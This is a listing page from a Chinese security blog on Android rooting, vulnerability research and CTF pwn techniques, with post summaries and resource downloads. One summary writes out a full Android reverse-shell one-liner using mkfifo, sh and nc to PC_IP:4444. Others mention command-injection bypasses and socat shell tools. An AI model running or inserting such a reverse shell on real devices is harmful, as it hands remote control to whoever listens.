自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(898)
  • 资源 (45)
  • 收藏
  • 关注

转载 移动安全---缘起:从零开始root

上一篇发了如何写一个hook框架,但是还是依赖于root权限,而在android平台,magisk就是root的代名词。所以开始了。。。。。无感知的root工具,你可以将su文件的名字随意更改,然后配合上一篇的rxposed完成全局hook工作。

2024-07-31 17:37:31 63

转载 checklist——漏洞挖掘 _

该checklist是专门服务于闭关这三个月,主要是记录与漏洞挖掘相关的内容,同时也会把之前收集的与漏洞挖掘相关的内容归类于此,便于学习和查看。

2024-07-16 14:24:03 169

翻译 CVE-2024-0044通过换行注入绕过 Android 上的“run-as”可调试性检查

拥有 Android 设备 ADB 访问权限的攻击者可以欺骗“run-as”工具,使其认为任何应用都可以调试。通过这样做,他们可以像系统中的大多数应用一样读取和写入私有数据并调用系统 API(包括许多特权应用,但不是以用户身份运行的应用)system。此外,他们还可以通过修改 GMS 在其数据目录中缓存的可执行代码,以 Google 移动服务 (GMS) 或使用其 SDK 的应用的身份实现持久代码执行。Google 将此问题编号为中进行了修复,该公告于今日公开。

2024-07-11 10:20:13 225

转载 深入 Android 可信应用漏洞挖掘

不过现在我们去看它官方的 git上面的库,其实是能发现它自己使用Python实现了一套类似ASAN的堆溢出的检测逻辑,它的检测的思路跟ASAN的逻辑是一模一样的,当我要执行一个内存分配,比如malloc(8)的时候,它会在分配的堆块的前方跟后方各自插入一个red zone,那么当TA触碰到这两个red zone的时候,就会自然地认为发生了越界访问,从而抛出异常。其实不是的,我们的目标可以是那些子品牌发布了很久,但是具备最新OEM系统的手机,因为我们的目标很简单,拥有一台具备最新系统的手机就可以了。

2024-06-24 10:39:25 158

转载 Android App半自动化静态漏洞挖掘技术分析

这款工具是现在很多Android静态分析工具的核心,它会分析dex并完全解析其中的类、方法,生成相关的Python类,在Androguard分析完后,某个类/方法调用了谁,谁调用了它,全都保留在内存里。如果编写漏洞挖掘工具的成本是人工审计加脚本挖掘的几倍甚至几十倍,那也就没有编写漏洞扫描器的意义了(如果是商业扫描器,或者企业内部的扫描器,自然有必要解决这个问题)。2021年7月,在编写『基于文本匹配的半自动化漏洞扫描器』时,我们想到可以结合这两个扫描器,将他们的优势互补,便可很大程度弥补各自的缺陷。

2024-06-24 10:15:48 190

翻译 小米设备中发现 20 个安全问题

小米中的漏洞可导致以系统权限访问任意活动、接收器和服务,以系统权限窃取任意文件,泄露手机、设置和小米帐户数据,以及其他漏洞。当攻击者向此接收器发送广播时,他们可以提供两个值,并且意图将首先传递给小米接收器,但之后,它将被重定向到攻击者提供的接收器。例如,在此漏洞的背景下,攻击者将能够访问用户设备上安装的所有应用程序的任意活动。此外,与之前的漏洞一样,设置是一个系统应用程序,因此此功能允许攻击者在任何已安装的应用程序中绝对绑定用户设备上声明的任何服务。此外,由于错过了其中的验证,攻击者可以访问,例如,

2024-06-14 10:55:21 183

翻译 小米TEE可信执行环境安全漏洞(2022)

腾讯支付是腾讯控股有限公司旗下的一个软件平台,主要功能是提供在移动应用和远程后端服务器之间传输的支付包的验证功能。对于每个业务场景,比如支付业务、登录业务,应用都需要生成一对AuthKey,生成过程和ASK生成类似,私钥保存在TEE中,公钥上传到应用服务器,不同之处在于第三方应用需要自己使用ASK公钥来验证AuthKey的合法性。在腾讯云存储中,密钥有三层:设备密钥(ATTK)、应用密钥(ASK)、业务密钥(AuthKey),这些密钥都是RSA-2048的非对称密钥,所有密钥均受到TEE的保护和安全存储。

2024-06-13 18:01:40 300

转载 「AVSS研报」原生Android及鸿蒙黑灰产对抗能力初评-应用篇

这一机制的实现可以消除开发者的安全顾虑,避免了应用加壳等方案可能导致的流畅度下降,而且开发者往应用市场提交的非加壳安装包有助于审核制的落实,两全其美。原生Android上有应用沙箱机制,通过UID DAC和SELinux MAC分离系统和各个应用,HarmonyOS NEXT更进了一步,其应用沙箱机制会对每个应用在/mnt/sandbox/目录中映射专属的“应用沙箱目录”,应用仅能访问此”目录“,此机制把应用可见的文件限制在最小范围,避免数据被恶意路径穿越访问。

2024-06-12 14:27:37 133

转载 AI换脸、插件陷阱,OKX、币安用户损失千万,交易所真的安全吗?

该事件发生在5月初,据该用户描述,其账户被盗的原因与个人泄露无关,而是黑客通过登录邮箱号点击忘记密码,并同步构建了一个假身份证以及AI换脸的视频,绕开了防火墙,进一步更换了手机号、邮箱以及谷歌的验证器,随后在24小时内,盗取了账户所有资产。据Nakamao最初自述,币安此前就已了解到该插件的问题,在今年3月就有类似案件发生,而币安也在此后追踪到了黑客,或是为避免打草惊蛇,没有及时通知暂停产品,且还让KOL继续与黑客保持联络,而在此阶段,Nakamao就成了下一个受害者。

2024-06-07 10:32:05 48

转载 用burp或fiddler+Proxifier 抓PC端exe程序数据包

Proxifier v3.42中文版,官方正版,免费,exe抓包工具,下载地址:https://download.csdn.net/download/ab6326795/89307897。

2024-05-14 21:55:40 2503 1

翻译 【Android漏洞】“脏流” Dirty Stream 攻击原理详解

我们正在分享这项研究,以便开发者和发行商可以检查他们的应用程序是否存在类似问题,进行适当的修复,并防止将此类漏洞引入新的应用程序或版本中。Microsoft 在多个流行的 Android 应用程序中发现了与路径遍历相关的漏洞模式,该模式可能使恶意应用程序能够覆盖易受攻击的应用程序主目录中的文件。然而,我们经常遇到这样的情况:消费应用程序不验证它接收到的文件的内容,最令人担忧的是,它使用服务应用程序提供的文件名将接收到的文件缓存在消费应用程序的内部数据目录中。我们发现的两个易受攻击的应用程序示例是。

2024-05-06 17:20:18 4417 1

原创 二、pwn - 零基础ROP之PIE保护绕过-碰撞

本文唯一区别在于,我们不利用vulnerable_function打印的地址,无法定位pie base地址,直接随机碰撞(爆破)~ 有一定比例成功的可能,贴近实战!但是呢,内存溢出后覆盖PC,要么修改2位、4、6、8...位,无法修改3位,又因为arm是小端模式,例如0x6b25741, 在内存中排列为0x41 0x57 0x6b...所以0x70d 是低地址,前面存在1位 未知的数值,在1-F (16进制)之间,可能是0x170d、也可能是0x270d、0x370d...0xf70d。

2024-04-18 15:43:33 422 2

原创 pwn程序已经运行了,payload字节数组包含不可见字符,无法进行utf8编码,这个时候怎么输入?

如果你想要使用 Python 脚本向一个已经运行的程序发送包含不可见字符的 payload,你需要确保你有一种方法来将 Python 脚本的输出重定向到该程序的输入。如果你的程序已经在运行,并且你可以使用 GDB 附加到进程,那么你可以使用 GDB 来修改内存或者调用函数来发送你的 payload。在实践中,如果你没有权限或者无法确定程序的 PID,或者程序不是从标准输入读取数据,你可能需要考虑使用其他的方法(比如 GDB 或者修改程序的运行方式来接受来自特定管道或文件的输入)。目录下的文件描述符来写入。

2024-04-17 23:36:56 986

原创 一、pwn - 零基础ROP之Android ARM 32位篇(新修订,精华篇)

一旦你知道了溢出的偏移量,你就可以构造一个包含NOP滑梯、shellcode以及用于覆盖PC的正确地址的有效载荷。你需要确保shellcode位于溢出点之后,并且PC被设置为指向NOP滑梯的开始部分,这样当执行流到达该位置时就会滑入你的shellcode并执行。使用模式创建工具来确定哪部分输入覆盖了程序计数器(PC),是一种常见的方法,特别是在开发缓冲区溢出漏洞利用时。当程序崩溃时,检查程序计数器(PC)的值。工具将输出一个数字,表示在模式中的偏移量,这个数字就是从输入数据的开始到覆盖PC的点的字节数。

2024-04-17 18:18:54 1024 1

转载 pwndbg 基本操作指令

/生成50个用来溢出的字符,如:aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama。//显示rdi寄存器的值,注意和x的区别,这只是显示rdi的值,而不是rdi指向的值。//查看0x123456地址的值,//计算0x10-0x08的结果。//打印fun_name的地址,//显示arena的详细信息。//打印包含返回地址的栈地址。//像IDA那样显示数据,//直接看canary的值。//显示rdi指向的值。//查看变量a的地址。,会跟提示所有操作堆的地方。

2024-04-17 10:14:08 333

原创 一行代码实现Android反向shell(Reverse shell)

cd /data/data/你的私有目录 && mkfifo f && cat f | /system/bin/sh -i 2>&1 | nc PC_IP 4444 > f。你的私有目录 这个目录可以是你APK的目录,或者你权限读写执行的目录。通过反向shell,即使你无法启用 adb,你也可以拥有一个反向 shell 并通过你的 PC 控制手机。本文通过一行代码即可实现Android反向shell(Reverse shell)。网上关于android得反向shell 多是需要安装apk的,操作麻烦。

2024-04-12 21:00:12 346

转载 CTF-命令注入绕过技巧总结

执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。

2024-04-10 17:21:46 457

转载 Linux设置Swap虚拟内存方法

*MySQL 报错InnoDB: Cannot allocate memory for the buffer pool,后来发现是虚拟内存不够。**

2024-04-08 10:58:20 103

原创 Samba实现windows和Linux共享文件,环境搭建

Samba实现windows和Linux共享文件,环境搭建

2024-04-07 11:44:32 582

转载 CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过

学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。

2024-04-01 17:04:41 813

转载 使用Wireshark获取USB数据

Wireshark是世界上最流行的网络协议分析软件,并且是一个免费的、开源的工具。相信做过网络开发的一定用过这个工具进行过抓包分析。借助USBUSBPcap从I/O请求包(IRP)中携带的USB请求块(URBs)中捕获数据。Wireshark将报文以帧的形式呈现。USBPcap的数据包与USB规范的数据包不完全相同,Wireshark的帧与USB帧也不同。

2024-03-26 11:33:08 2416

转载 C语言中不安全函数、安全函数

那么,您应该认为如果您的缓冲区足够大,可以处理可能的最长名称,您的程序会 安全,对吗?它可以做与 gets() 所做的同样的事情,但它接受用来限制读入字符数目的大小参数,因此,提供了一种防止缓冲区溢出的方法。遗憾的是,即使是系统调用的“安全”版本 ― 譬如,相对于 strcpy() 的 strncpy() ― 也不完全安全。然而,获得效率的代价是,C 程序员必须十分警觉,并且有极强的安全意识,才能防止他们的程序出现问题,而且即使这些,使代码不出问题也不容易。没有实际执行堆栈中的代码,只有堆中的代码。

2024-03-08 15:19:38 588

原创 Android抓包--不走代理的请求Proxy.NO_PROXY,过代理检测,burpsuite+Postern

网上很多不走代理检测的抓包都是charles + Postern 或 charles + Postern + burpsuite,本文使用burpsuite+Postern。

2024-03-05 16:31:30 1180

原创 android系统开发之-- 修改buid.prop、init.rc、禁用BL锁、关闭dm-verity

在这个文件中,可以找到build.prop文件的相关配置信息。这个文件定义了Android系统的初始化过程和启动时的行为。

2024-03-01 10:26:58 1359 1

原创 android系统开发之--ROM编译,repo使用指南

事实上,当repo init完成,在本地的.repo/manifests目录下就可以看到manifest这个git project,可以用git branch -av来查看branch,用git log来查看日志。3. -m指定的是,下载该git project中的哪个文件(应该是首先切换了branch,然后再下载该文件)。-c 的意思是只下载manifest中定义的当前分支,不下载其他分支,manifest中默认会开启 -c。-d 的意思脱离本地分支,切换到服务器的分支,前提是本地代码要clean。

2024-02-28 14:49:05 697

原创 【精华】android抓包https(tls)全教程,openssl生成burpsuite证书,并导入

为什么需要365天证书,因为chrome等一些软件会检测证书时长,太长了报错:证书有效期过长的错误1、openssl生成burpsuite证书然后一路按回车,直到生成2、生成p12证书文件自定义一个密码,比如1234563、导入到burpsuite,点击代理-选项-导入/导出ca证书-进口(import)-来自pkcs12密钥库的证书和密钥,选择burp.pfx文件,输入密码,点击下一步完成。

2024-02-27 15:03:28 1359

转载 Bootloader 中有什么办法判断 APP 是否有效?(固件升级)

今天在论坛看到这么一个提问:在嵌入式产品开发初期,我们一般都会用下载器或者仿真器接到板子的下载口进行下载和调试,而一旦产品进入到市场,由于批量品的下载口往往会在产品外壳内部,有些产品甚至在发布时会去掉下载口,此时再使用下载器就会变得非常麻烦,对于去掉下载口的直接无法完成程序的升级!因此我们一般都会在产品中加入在线升级功能,即通过产品内部的一段升级程序将应用程序更新掉,从而实现无需借助外部烧录工具就可以将程序进行升级。如今的手机、智能手表的升级功能就是使用了这种设计。

2024-02-22 16:13:00 723

原创 【教程】N2N V3内网穿透、异地组网,包括Win/Linux/Android,包括不同内网实现adb远程连接

其中,-l是云服务器实例的公网 IPv4 地址和端口号,-a参数是指定自己虚拟网卡的地址,可以在有限范围内乱编,当然更推荐的是使用自动分配地址,建议先凑合着用静态分配的,-k参数是密钥,-d参数是TAP虚拟网卡适配器的名字, 至于其他,照搬过来就好,至于-c参数 表示小组名称,只有同属一个相同-c的同网段用户,才能相互访问得到。TCP 和UDP都放开吧。说下背景,因为某些原因,需要远程调试客户的Android手机,而且,还是异地的客户。如果你电脑装了openvpn,那么默认就装过了,这个步骤可以跳过。

2024-02-20 17:44:55 2219

原创 【解决】ping6: connect: Network is unreachable(ping IPv6不通)

linux 下,ping 某个IPV6报错,例如:ping6 zjj.sz.gov.cn。

2024-02-19 16:51:57 4880

原创 cmd: Failure calling service package: Failed transaction(2147483646)

解决cmd: Failure calling service package: Failed transaction(2147483646)

2024-02-02 16:12:28 1892

原创 Android super.img解包和打包指南(含工具下载lpunpack、lpmake、lpdump)

Android super.img的解包和打包指南,含工具下载lpunpack、lpmake、lpdump

2024-02-01 14:57:04 7370 2

转载 Android-based PAX POS vulnerabilities (Part 1)

Banking companies worldwide are finally shifting away from custom-made Point of Sale (POS) devices towards the wildly adopted and battle-tested Android operating system. No more obscure terminals; the era of giant, colorful touchscreens is here! While Andr

2024-01-18 10:59:30 167

转载 如何进行电压故障注入

在物联网设备的物理安全评估过程中,目标之一是利用调试接口或可访问芯片来研究设备的工作原理。理想的情况是提取整个文件系统,以找到获得设备 root 访问权限的方法。然后,可以更轻松地检查正在运行的服务,并在需要时对其进行调试,以最终控制目标。在审计开始时,通常会遇到调试接口上的保护,禁止访问其全部功能,或者引导链上的保护,禁止对其进行任何修改。故障是尝试绕过这种保护的一种方法。在这篇博文中,我们将通过几个研究案例深入探讨电压毛刺,以了解它的工作原理以及它如何提供帮助。

2024-01-17 16:36:16 315

翻译 用于 Linux 系统故障排除和收集信息的 7 个“dmesg”命令(打印内核日志)

2003288K/2059928K可用(6352K内核代码,607K rwdata,2640K rodata,880K init,908K bss,56640K保留,1146920K highmem)是的,如果需要,我们可以使用以下命令清除 dmesg 日志。当我们连接或断开系统上的硬件设备时,借助 dmesg 命令,我们可以实时了解检测到或断开的信息。[0.000000]BIOS-e820:[mem 0x0000000000100000-0x000000007dc08bff]可用。

2024-01-10 17:35:30 919

转载 演示Heap Spray(堆喷射)的原理

常见方法有:溢出栈变量,因为baseObj指针保存在栈上,溢出后baseObj指向的不再是堆上的base对象,而是指向某个被伪造的数值。之后baseObj去虚函数表0x0c0c0c0c中取虚函数,由于0x0c0c0c0c附近的内存块取到的值都是0x0c0c0c0c,而这个值被进程当做函数指针,因此最后会发生类似call 0x0c0c0c0c,引导Eip去堆空间0x0c0c0c0c处取指令运行。12ff6c是指针变量baseObj在栈上的地址,其值指向0x4300A0----这是分配在堆上的base对象。

2024-01-10 11:22:31 273

原创 VSCode C/C++(gdb)调试指南

左侧侧边栏->确保打开回调栈右键函数栈->查看反汇编。

2024-01-09 10:55:32 2907

原创 【解决】executable‘s TLS segment is underaligned: alignment is 8, needs to be at least 32 for ARM Bionic

解决办法:使用ndk-r21e,指定`--sysroot=/path/to/ndk-r21e/**/sysroot`标志,

2024-01-08 17:38:11 684

原创 源码安全静态扫描工具对比

源码安全静态扫描工具对比

2024-01-04 13:57:42 587

转载 直接修改ROM的init.rc,重新打包刷入不生效的原因

不能经过adb shell修改的缘由(8楼) spainit.rc 是 rootfs 中的文件,Android 将 rootfs(initramfs) link 到 linux kernel image 中,生成正常启动的boot.img, recovery 模式的 recovery.img. get。

2023-12-31 18:26:43 450

转载 Magisk 对 boot.img 做了什么?

总之,Magisk 主要通过向 boot.img 中添加二进制文件和修改 init 脚本来注入 Magisk 框架并获取 root 权限,同时禁用某些功能以避免干扰。

2023-12-30 21:46:46 527

Postern-3.1.3,https抓包工具,兼容Android14+

Postern-3.1.3,https抓包工具,兼容Android14+,解决了:Failure [INSTALL_FAILED_DEPRECATED_SDK_VERSION: App package must target at least SDK version 23, but found 16] 的安装错误问题。 使用教程参见:https://blog.csdn.net/tabactivity/article/details/136482383?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522172282327616800185832717%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D

2024-08-05

RKFW固件、update.img文件解包工具-rkunpack,打包工具rkafpack,dump工具rkdump等

1、本工具作用:解包、打包 文件magic为RKFW的文件,文件后缀一般为 .rkfw 或 .img, 例如 update.img 本文将适用于linux系统,其他系统请参见步骤3,尝试编译出工具 2、用法:在rkutils工具目录执行(不要到其他目录执行),例如解包update.img $ ./rkunpack /mnt/d/rom/RomTool/K2_MINI/update.img 执行完成后将会在当前目录生成 system.img\cache.img\uboot.img\boot.img等 3、你也可以自行编译rkunpack,执行完成后将会在当前目录生成 gcc -o rkunpack rkunpack.c

2024-07-29

arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat

arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn

2024-04-17

32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具

Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。 Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、Openssl、Socket等。 android反向shell工具。 本zip包含socat arm版本 和 arm64版本,可以push到android设备运行。 例如: adb push socat /data/local/tmp/ adb shell cd /data/local/tmp/ /socat -d TCP4-LISTEN:10001,fork EXEC:/system/bin/sh,pty,stderr android端 可以不需要root,也可以root,都行。 另一端主机用nc 【android设备IP】:10001进行连接即可远程 android shell

2024-04-16

avbtool.py查看boot.img、system.img、vbmeta.img签名信息工具

avbtool.py查看boot.img、system.img、vbmeta.img签名信息工具, linux平台用法: $ sudo apt install python2.7 $ python2.7 avbtool.py info_image --image boot.img 其中 boot.img为你需要查看的img文件路径 windows平台需要字节研究,理论也可以用的。

2024-03-01

super.img解包打包工具-lpunpack、lpmake、lpdump

super.img解包打包工具--lpunpack、lpmake、lpdump linux 下可用。 解压密码:https://modun.blog.csdn.net/ 使用说明:参见我的文章 https://blog.csdn.net/tabactivity/article/details/135969964?

2024-02-01

android rom - logo.bin修改器中文版

可以解包、打包logo.bin、logo.img (ROM二进制文件)等,用于修改Android开机Logo、动画、充电图标等 中文版本,已测可用

2023-12-25

magisk模块,用于解决已经root,仍然提示adbd cannot run as root in production

magisk模块,用于解决已经root,但是执行“adb root”仍然提示“adbd cannot run as root in production builds”的问题; 使用说明:下载本模块后pull到设备里,然后在magisk 里安装。安装完成启动后自动生效! 然后执行“adb root”,就提示“adbd is already running as root” 啦! 安装本资源包会更改以下属性: ro.debuggable=1 service.adb.root=1 persist.security.adbinput=1 persist.fastboot.enable=1 ro.build.type="userdebug" 并且当su文件存在会禁用selinux

2023-12-20

vmw-Ogren-Group-Virtual-Patch-Cost-Saving

vmw-Ogren-Group-Virtual-Patch-Cost-Saving

2023-02-10

boot.img解压工具,可解决“unrecognized format. error!” 或 “ramdisk”报错

【以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1,以下二选1】 一、使用AIK重打包boot.img 将刷机包中的boot.img拷贝到AIK-Linux目录下,执行./unpackimg.sh解包,把./split_img/boot.img-zImage文件删掉,然后将Image.gz-dtb文件拷贝到./split_img目录下,并重命名为boot.img-zImage。 执行./repackimg.sh,生成image-new.img文件,即我们可以刷入的boot.img文件。 二、 如果AIK遇到 “unrecognized format. error!” 或 “ramdisk”问题 那么使用 mb 吧。这玩意似乎要MINGW,我cmd 里没跑通,MINGW里跑成功了!! unpack: ./mb.exe unpack /d/WPSSoftware/test/boot.img repack: ./mb.exe repack /d/WPSSoftware/test/boot.img

2023-01-05

卓岚TCP UDP调试助手+TCP-UDP服务管理V1.03+网络调试助手3.7

卓岚TCP UDP调试助手+TCP-UDP服务管理V1.03+网络调试助手3.7 三个工具都在这里。 截图和说明参见我博客:https://blog.csdn.net/tabactivity/article/details/120081594 已确认正常使用。

2022-10-13

make_ext4fs,linux下system.img打包工具

make_ext4fs,linux下system.img打包工具 使用教程参见: https://blog.csdn.net/tabactivity/article/details/125993855

2022-07-26

支付卡行业(PCI )资料安全标准(PCI DSS)

支付卡行业(PCI)资料安全标准(繁体中文版) chinese_traditional_pci_dss_audit_procedures_v1-1.pdf 这是免费开放的文档!!!

2022-07-01

strace-5.15 arm和arm64架构,Android可用

strace-5.15 arm和arm64架构,Android可用。包括arm、arm64 可执行elf文件 + 动态库shared(so)文件,合计4个文件

2022-01-04

adb push /adb pull工具

【解决】当设备已root使用adb命令, 提示'adbd cannot run as root in production builds',adb push /adb pull 到系统目录 解决方案 解压密码:hkxgame.com

2021-11-09

OpenVXN-2.5.3-I60-amd64.msi

OpenVXN,使用这个客户端 可加载.ovxn文件。亲测可用。

2021-09-02

cudnn-10.0-windows10-x64-v7.6.5.32.zip

cudnn-10.0-windows10-x64-v7.6.5.32.zip,官方原版文件

2021-03-29

XCODE自动编译生成IPA脚本(IOS)

将本脚本放到您的IOS项目里,cd到项目里,然后执行./run 项目名。然后项目就会自动编译-》xcarchive-》输出ipa到 output文件夹

2020-12-11

electron-v11.0.3-win32-x64.zip

Electron框架使您可以使用JavaScript,HTML和CSS编写跨平台的桌面应用程序。它基于Node.js和 Chromium,并且被Atom编辑器和许多其他应用程序使用。electron-v11.0.3-win32-x64.zip最新版

2020-11-29

Mac远程桌面连接windows,Microsoft Remote Desktop远程桌面工具10.5.0

最新的 Mac远程桌面连接windows,Microsoft Remote Desktop远程桌面工具10.5.0 。两个不同的系统,当然是不能互相访问,他们默认只有相同系统的连接方式。微软的 Microsoft Remote Desktop 工具可以实现 Mac 访问 windows 的桌面。官方原版,支持win10 !!!

2020-10-30

Obfuscation.sh,ollvm移植到LLVM10.0.1以及更高版本的脚本

Obfuscation.sh,Obfuscation移植到LLVM10.0.1以及更高版本的脚本,使用方法:https://blog.csdn.net/tabactivity/article/details/108995746

2020-10-10

ollvm的混淆反混淆和定制修改.doc

最近各大杀毒公司陆续都出了混淆,网上关于ollvm的资料比较少,于是就有了这篇文章,这篇文章介绍,android的native代码,也就是so和linux的c/c++代码均可使用的混淆工具ollvm的编译,混淆,反混淆,和反反混淆

2020-09-28

org.json等6个jar压缩包.rar

org.json.jsonobject等6个jar压缩包集合。包含JSONObject所必需的6个jar包: commons-beanutils-1.7.0.jar commons-collections-3.1.jar commons-lang-2.5.jar commons-logging.jar ezmorph-1.0.3.jar(这里是ezmorph-1.0.6.jar) json-lib-2.1-jdk15.jar(这里是json-20200518.jar) 压缩包里的都是2020年9月最新下载的!版本号都比网上的新。我单独使用json-20200518.jar编译也正常

2020-09-04

DroidCam安卓+PC端,测试可用

安卓DroidCam V6.7.7 + DroidCam PC 6.2.7,两个配合使用。可让手机当电脑摄像头 1、安装pc软件 2、adb forward tcp:4747 tcp:4747 3、安装Android 应用 4、启动连接

2020-06-24

Notepad++ 插件,AndroidLogger.V1.2.7. 可以让安卓日志自动显示颜色

Notepad++ 插件,AndroidLogger.V1.2.7. 可以让安卓日志自动显示颜色,告别白色背景 黑色字体!确保 打开的文件是.log后缀的。

2020-05-14

JEB 3.0.0.201808031948_Pro

JEB 3.0.0.201808031948_Pro 。PNF Software is the maker of JEB, the most powerful interactive Android app decompiler, built by and for security engineers.Decompile and debug APK files

2020-05-13

USB驱动-CH341SER(CH340 USB转串口WINDOWS驱动程序)

解决 win10"这个inf中的服务安装段落无效" 的错误。适用于CH340/CH341USB转串口WINDOWS驱动程序,支持32/64位 Windows 10/8.1/8/7/VISTA/XP,SERVER 2016/2012/2008/2003,2000/ME/98,通过微软数字签名认证,支持USB转3线和9线串口等,用于随产品发行到最终用户。

2020-04-25

keystore转x509.pem、pk8工具,兼容windows、linux

keystore转x509.pem、pk8工具,兼容windows、linux。内附使用说明。

2020-03-12

聊天机器人数据库,近2万条词汇sql

聊天机器人数据库,近2万条词汇sql。如假包换,假一赔十。例如其中几条: INSERT INTO `liaotian` VALUES (18112, '快刀砍骨头', '干干脆脆'); INSERT INTO `liaotian` VALUES (18124, '我喜欢你', '从现在开始,你只许对我一个人好;要宠我,不能骗我; 答应我的每一件事情,你都要做到; 对我讲的每一句话都要是真心。 不许骗我、骂我,要关心我; 别人欺负我时,你要在第一时间出来帮我; 我开心时,你要陪我开心; 我不开心时,你要哄我开心; 永远都要觉得我是最漂亮的; 梦里你也要见到我;在你心里只有我。');

2019-11-22

SR5-SuperSU-v2.82-SR5-20171001224502.zipS

需要配合 TWRP 使用。参见:https://blog.csdn.net/tabactivity/article/details/88355317 下载后push到手机,进入TWRP,选择 install 安装该文件,重启手机即可获得root权限

2019-03-14

linux_bootimg_tools

boot.img解包打包工具。这3个文件是linux程序。 需要放到linux下才能执行,记得chmod 755 这些文件权限 mkboot 就是 split_bootimg.pl。使用方法参见我的博客https://blog.csdn.net/tabactivity/article/details/88355317

2019-03-12

ctf-2015挑战rps.apk

ctf-2015挑战rps.apk,算出 该apk native函数 calc 返回值为多少。

2019-03-06

libcurl.a静态库(.a文件) android可用,包含(armeabi、x86、arm64-v8a、x86_64)

libcurl.a静态库(.a文件) android可用,包含(armeabi、x86、arm64-v8a、x86_64) 。基于 curl-7.61.1编译。

2018-10-30

protoc-3.0.0-win32.zip 和 protobuf3-for-unity

压缩包包含两个文件,protoc-3.0.0-win32.zip 和 protobuf3-for-unity。编译成功 protobuf3-for-unity-3.0.0\src\Google.Protobuf\bin\Release\net35目录下会有一个Google.Protobuf.dll,这个dll就是我们要用在unity项目/Assets/Plugins里面的。protoc-3.0.0-win32.zip 里的bin protoc是 protobuf文件生成工具,用于将 .proto文件生成.cs文件,然后拷贝到项目里,添加Google.Protobuf.dll依赖即可运行。

2018-10-09

windows unzip.exe 6.0

目前网上提供的unzip.exe都是5.0的,这个是目前unzip 存在的最新版本6.0(2009年出的,后续windows的就没了,所以2009年的还是最新的...........)

2018-08-31

android so动态调试-测试专用apk

android so动态调试 测试apk , 这个apk来自阿里 笔试题

2017-11-08

MemoryAnalyzer-1.6.1.20161125-win32.win32.x86_64

MemoryAnalyzer Android(JAVA)内存泄露(OOM)分析检测工具

2017-06-24

视频转git软件(Free Video to GIF Converter)

视频转git软件(Free Video to GIF Converter)

2017-04-16

C语言的Android binary XML(AXML)解析代码

C语言的Android binary XML(AXML)解析代码

2016-11-10

AndroidManifest二进制文件格式分析

AndroidManifest 二进制 文件格式 分析

2016-11-10

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除